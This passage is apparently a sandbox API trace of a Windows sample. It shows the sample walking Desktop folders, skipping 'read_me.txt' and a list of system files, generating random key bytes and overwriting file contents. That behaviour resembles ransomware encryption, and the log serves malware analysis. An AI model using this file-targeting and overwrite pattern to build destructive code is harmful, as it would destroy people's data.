ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.068] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\read_me.txt") returned 106 [0074.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\vpe92_uurvfymiy\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x850 [0074.068] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.068] CloseHandle (hObject=0x850) returned 1 [0074.068] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a74c30, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0074.068] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0074.068] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\read_me.txt") returned 106 [0074.068] GetProcessHeap () returned 0x280000 [0074.068] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8aa00b0 | out: hHeap=0x280000) returned 1 [0074.068] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 43 [0074.068] GetProcessHeap () returned 0x280000 [0074.068] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ac00c0 | out: hHeap=0x280000) returned 1 [0074.068] GetProcessHeap () returned 0x280000 [0074.068] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ac00c0 [0074.068] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\*") returned 101 [0074.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb1937780, ftCreationTime.dwHighDateTime=0x1d4d454, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0074.068] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\.") returned 101 [0074.068] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb1937780, ftCreationTime.dwHighDateTime=0x1d4d454, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0074.069] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\..") returned 102 [0074.069] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b83730, ftCreationTime.dwHighDateTime=0x1d4c6e6, ftLastAccessTime.dwLowDateTime=0x8aba0a60, ftLastAccessTime.dwHighDateTime=0x1d4d3b0, ftLastWriteTime.dwLowDateTime=0x8aba0a60, ftLastWriteTime.dwHighDateTime=0x1d4d3b0, nFileSizeHigh=0x0, nFileSizeLow=0xf82e, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="HrxLxYDTaNs.swf", cAlternateFileName="HRXLXY~1.SWF")) returned 1 [0074.069] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\HrxLxYDTaNs.swf") returned 115 [0074.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\HrxLxYDTaNs.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\vpe92_uurvfymiy\\5q 1\\hrxlxydtans.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x850 [0074.069] StrStrW (lpFirst="hrxlxydtans.swf", lpSrch="read_me.txt") returned 0x0 [0074.069] StrStrW (lpFirst="hrxlxydtans.swf", lpSrch="autoexec.bat") returned 0x0 [0074.069] StrStrW (lpFirst="hrxlxydtans.swf", lpSrch="desktop.ini") returned 0x0 [0074.069] StrStrW (lpFirst="hrxlxydtans.swf", lpSrch="autorun.inf") returned 0x0 [0074.069] StrStrW (lpFirst="hrxlxydtans.swf", lpSrch="ntuser.dat") returned 0x0 [0074.069] StrStrW (lpFirst="hrxlxydtans.swf", lpSrch="iconcache.db") returned 0x0 [0074.069] StrStrW (lpFirst="hrxlxydtans.swf", lpSrch="bootsect.bak") returned 0x0 [0074.069] StrStrW (lpFirst="hrxlxydtans.swf", lpSrch="boot.ini") returned 0x0 [0074.069] StrStrW (lpFirst="hrxlxydtans.swf", lpSrch="ntuser.dat.log") returned 0x0 [0074.069] StrStrW (lpFirst="hrxlxydtans.swf", lpSrch="thumbs.db") returned 0x0 [0074.069] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 51 [0074.069] QueueUserWorkItem (Function=0x404e00, Context=0x850, Flags=0x0) returned 1 [0074.069] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f4c0b20, ftCreationTime.dwHighDateTime=0x1d4c668, ftLastAccessTime.dwLowDateTime=0x9f9e70a0, ftLastAccessTime.dwHighDateTime=0x1d4cc5e, ftLastWriteTime.dwLowDateTime=0x9f9e70a0, ftLastWriteTime.dwHighDateTime=0x1d4cc5e, nFileSizeHigh=0x0, nFileSizeLow=0xdc76, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="JosdybsYa9WW8YJ6_C.xlsx", cAlternateFileName="JOSDYB~1.XLS")) returned 1 [0074.069] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\JosdybsYa9WW8YJ6_C.xlsx") returned 123 [0074.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\JosdybsYa9WW8YJ6_C.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\vpe92_uurvfymiy\\5q 1\\josdybsya9ww8yj6_c.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x854 [0074.070] StrStrW (lpFirst="josdybsya9ww8yj6_c.xlsx", lpSrch="read_me.txt") returned 0x0 [0074.070] StrStrW (lpFirst="josdybsya9ww8yj6_c.xlsx", lpSrch="autoexec.bat") returned 0x0 [0074.070] StrStrW (lpFirst="josdybsya9ww8yj6_c.xlsx", lpSrch="desktop.ini") returned 0x0 [0074.070] StrStrW (lpFirst="josdybsya9ww8yj6_c.xlsx", lpSrch="autorun.inf") returned 0x0 [0074.070] StrStrW (lpFirst="josdybsya9ww8yj6_c.xlsx", lpSrch="ntuser.dat") returned 0x0 [0074.070] StrStrW (lpFirst="josdybsya9ww8yj6_c.xlsx", lpSrch="iconcache.db") returned 0x0 [0074.070] StrStrW (lpFirst="josdybsya9ww8yj6_c.xlsx", lpSrch="bootsect.bak") returned 0x0 [0074.070] StrStrW (lpFirst="josdybsya9ww8yj6_c.xlsx", lpSrch="boot.ini") returned 0x0 [0074.070] StrStrW (lpFirst="josdybsya9ww8yj6_c.xlsx", lpSrch="ntuser.dat.log") returned 0x0 [0074.070] StrStrW (lpFirst="josdybsya9ww8yj6_c.xlsx", lpSrch="thumbs.db") returned 0x0 [0074.070] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 52 [0074.070] QueueUserWorkItem (Function=0x404e00, Context=0x854, Flags=0x0) returned 1 [0074.070] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf6a160, ftCreationTime.dwHighDateTime=0x1d4ca1a, ftLastAccessTime.dwLowDateTime=0xec84a1f0, ftLastAccessTime.dwHighDateTime=0x1d4d20d, ftLastWriteTime.dwLowDateTime=0xec84a1f0, ftLastWriteTime.dwHighDateTime=0x1d4d20d, nFileSizeHigh=0x0, nFileSizeLow=0x9c55, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="kUy2s6gipM.png", cAlternateFileName="KUY2S6~1.PNG")) returned 1 [0074.070] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\kUy2s6gipM.png") returned 114 [0074.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\kUy2s6gipM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\vpe92_uurvfymiy\\5q 1\\kuy2s6gipm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x858 [0074.070] StrStrW (lpFirst="kuy2s6gipm.png", lpSrch="read_me.txt") returned 0x0 [0074.070] StrStrW (lpFirst="kuy2s6gipm.png", lpSrch="autoexec.bat") returned 0x0 [0074.070] StrStrW (lpFirst="kuy2s6gipm.png", lpSrch="desktop.ini") returned 0x0 [0074.071] StrStrW (lpFirst="kuy2s6gipm.png", lpSrch="autorun.inf") returned 0x0 [0074.071] StrStrW (lpFirst="kuy2s6gipm.png", lpSrch="ntuser.dat") returned 0x0 [0074.071] StrStrW (lpFirst="kuy2s6gipm.png", lpSrch="iconcache.db") returned 0x0 [0074.071] StrStrW (lpFirst="kuy2s6gipm.png", lpSrch="bootsect.bak") returned 0x0 [0074.071] StrStrW (lpFirst="kuy2s6gipm.png", lpSrch="boot.ini") returned 0x0 [0074.071] StrStrW (lpFirst="kuy2s6gipm.png", lpSrch="ntuser.dat.log") returned 0x0 [0074.071] StrStrW (lpFirst="kuy2s6gipm.png", lpSrch="thumbs.db") returned 0x0 [0074.071] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 53 [0074.071] QueueUserWorkItem (Function=0x404e00, Context=0x858, Flags=0x0) returned 1 [0074.071] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82ac3920, ftCreationTime.dwHighDateTime=0x1d4d12f, ftLastAccessTime.dwLowDateTime=0x54cb54e0, ftLastAccessTime.dwHighDateTime=0x1d4d144, ftLastWriteTime.dwLowDateTime=0x54cb54e0, ftLastWriteTime.dwHighDateTime=0x1d4d144, nFileSizeHigh=0x0, nFileSizeLow=0x6439, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="nBTFhev2dXS.mp3", cAlternateFileName="NBTFHE~1.MP3")) returned 1 [0074.071] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\nBTFhev2dXS.mp3") returned 115 [0074.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\nBTFhev2dXS.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\vpe92_uurvfymiy\\5q 1\\nbtfhev2dxs.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x85c [0074.071] StrStrW (lpFirst="nbtfhev2dxs.mp3", lpSrch="read_me.txt") returned 0x0 [0074.071] StrStrW (lpFirst="nbtfhev2dxs.mp3", lpSrch="autoexec.bat") returned 0x0 [0074.071] StrStrW (lpFirst="nbtfhev2dxs.mp3", lpSrch="desktop.ini") returned 0x0 [0074.071] StrStrW (lpFirst="nbtfhev2dxs.mp3", lpSrch="autorun.inf") returned 0x0 [0074.071] StrStrW (lpFirst="nbtfhev2dxs.mp3", lpSrch="ntuser.dat") returned 0x0 [0074.071] StrStrW (lpFirst="nbtfhev2dxs.mp3", lpSrch="iconcache.db") returned 0x0 [0074.072] StrStrW (lpFirst="nbtfhev2dxs.mp3", lpSrch="bootsect.bak") returned 0x0 [0074.072] StrStrW (lpFirst="nbtfhev2dxs.mp3", lpSrch="boot.ini") returned 0x0 [0074.072] StrStrW (lpFirst="nbtfhev2dxs.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0074.072] StrStrW (lpFirst="nbtfhev2dxs.mp3", lpSrch="thumbs.db") returned 0x0 [0074.072] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 54 [0074.072] QueueUserWorkItem (Function=0x404e00, Context=0x85c, Flags=0x0) returned 1 [0074.072] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a74c30, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.072] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\read_me.txt") returned 111 [0074.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\vpe92_uurvfymiy\\5q 1\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x860 [0074.072] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.072] CloseHandle (hObject=0x860) returned 1 [0074.072] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a74c30, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0074.072] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0074.072] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\read_me.txt") returned 111 [0074.072] GetProcessHeap () returned 0x280000 [0074.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ac00c0 | out: hHeap=0x280000) returned 1 [0074.072] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 44 [0074.072] GetProcessHeap () returned 0x280000 [0074.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ae10d8 | out: hHeap=0x280000) returned 1 [0074.072] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.072] ReadFile (in: hFile=0x7a4, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.073] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.073] GetProcessHeap () returned 0x280000 [0074.073] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0074.073] GetProcessHeap () returned 0x280000 [0074.073] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0074.073] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0074.073] GetProcessHeap () returned 0x280000 [0074.073] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc4668 [0074.073] ReadFile (in: hFile=0x7a4, lpBuffer=0x7dc4668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc4668*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0074.155] SetFilePointerEx (in: hFile=0x7a4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.155] WriteFile (in: hFile=0x7a4, lpBuffer=0x7dc4668*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc4668*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.155] GetProcessHeap () returned 0x280000 [0074.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.155] GetProcessHeap () returned 0x280000 [0074.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.156] GetProcessHeap () returned 0x280000 [0074.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.156] GetProcessHeap () returned 0x280000 [0074.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0074.159] GetProcessHeap () returned 0x280000 [0074.159] 